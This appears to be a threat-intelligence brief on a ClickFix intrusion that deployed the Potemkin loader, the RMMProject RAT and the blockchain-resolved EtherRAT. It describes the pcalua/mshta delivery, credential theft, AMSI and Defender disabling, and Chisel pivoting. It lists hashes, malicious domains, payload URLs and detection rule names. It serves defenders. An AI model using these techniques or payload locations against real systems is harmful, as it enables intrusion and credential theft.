← All briefs
high July 2, 2026

Potemkin Loader ClickFix Intrusion: Multi-Stage Campaign Deploying RMMProject RAT and Blockchain-Resolved Backdoor

Source report →

In a confirmed hands-on intrusion spanning eleven endpoints, attackers gained initial access through a ClickFix lure served from a compromised website that directed victims to paste a command into the Windows Run dialog. The command abuses pcalua.exe as a LOLBIN to spawn mshta.exe with a remote HTA URL, which silently downloads and executes an MSI installer delivering the Potemkin loader. Potemkin is a compact custom loader that uses a deterministic domain generation algorithm built on XorShift32 to probe ten thousand candidate domains for active C2, reflectively loading its follow-on payload directly in memory once contact is made. The use of a shared DGA codebase between Potemkin and its second stage, RMMProject, suggests a single development team behind the campaign.

RMMProject is a modular RAT framework embedding a LuaJIT scripting engine that gives the operator dynamic execution capability without recompiling the implant. Its capabilities cover browser credential and cookie theft across Chrome, Firefox, and Edge, an App-Bound Encryption bypass that injects a helper DLL into a spawned Chrome process to decrypt stored secrets from Chrome version 127 and later, remote desktop control on a hidden Windows desktop, process injection, and reflective module loading. Following RMMProject deployment, a second installer delivers EtherRAT: a Node.js-based backdoor that resolves its C2 server address by reading a value from an Ethereum smart contract, making the C2 channel resilient to domain takedowns since updates require only a low-cost blockchain transaction. A renamed Cloudflare tunnel binary provides an additional persistent inbound access channel.

What distinguishes this intrusion is the visible adaptability of the human operator once inside. Rather than running a fixed playbook, the attacker cycled through a progression of defense evasion techniques in response to Defender detections: beginning with disabling Windows' built-in script scanning interface (AMSI) via .NET reflection, escalating to registry policy writes that stripped real-time protection, then adding exclusion paths via PowerShell, and ultimately terminating the Windows Defender service entirely when earlier attempts were blocked. This back-and-forth against endpoint defenses played out while the attacker simultaneously deployed a Chisel reverse proxy for network pivoting and spread the loader across eleven hosts using Impacket-style remote execution, compromising domain administrator credentials and reaching the domain controller. The attacker likely had hours of unobserved access on at least one endpoint before any telemetry existed, underscoring the risk of gaps in endpoint monitoring coverage.

SHA256 FILE HASH 5
2abe5dd3a057fdef935722e50e9251c272d29fd26113187b853a1f9a9cb89d9b
79f7b67ce8b39070f3e1c2b90fce0ce84134782a7dedcccc1edac197ee9e089b
3b7ae925e2d64522b4f69b56285b05aeca8c5aab5ab46a9c02c4fafb69d881ce
cd4e5e2c65b1660470d3446539ee68adf5faeece3eaeb46583623be9911ee145
2ada24dd6e517f37942b749c2bd57ddd97445e9853002cee70a0bc30d0b0ce3a
IP ADDRESS 2
77.110.122.58
213.165.41.26
DOMAIN 5
cl.distritovagas.com
sonra.eutialyson.com
anus-staylard.xyz
pestrear-lamp.xyz
resumeacceptable.com
URL 2
https://cl.distritovagas.com/hte.hta
https://sonra.eutialyson.com/inst24.msi
FILE NAME 5
inst24.msi
cons_1.0.1.msi
hyper-v.ver
ek_kill_av.ps1
ek_disable_av.ps1

Detections (10)

Enable detections →

Connect your environment for suggestions and queries personalized to your security telemetry.

  • ClickFix-RunMRU-Registry-Write-with-Suspicious-Command
  • ConHost Headless Spawning Node Process
  • WinDefend Service Termination via PowerShell
  • Windows Defender Protection Disabled via PowerShell or Registry
  • Scheduled Task Registering Binary from User-Writable Path
  • Non-Browser Process Connecting to Ethereum RPC
  • PUA - Chisel Tunneling Tool Execution
  • Detect reflective DLL injection or in-memory assembly loading without disk writes
  • Detect encoded PowerShell, download cradles, and AMSI bypasses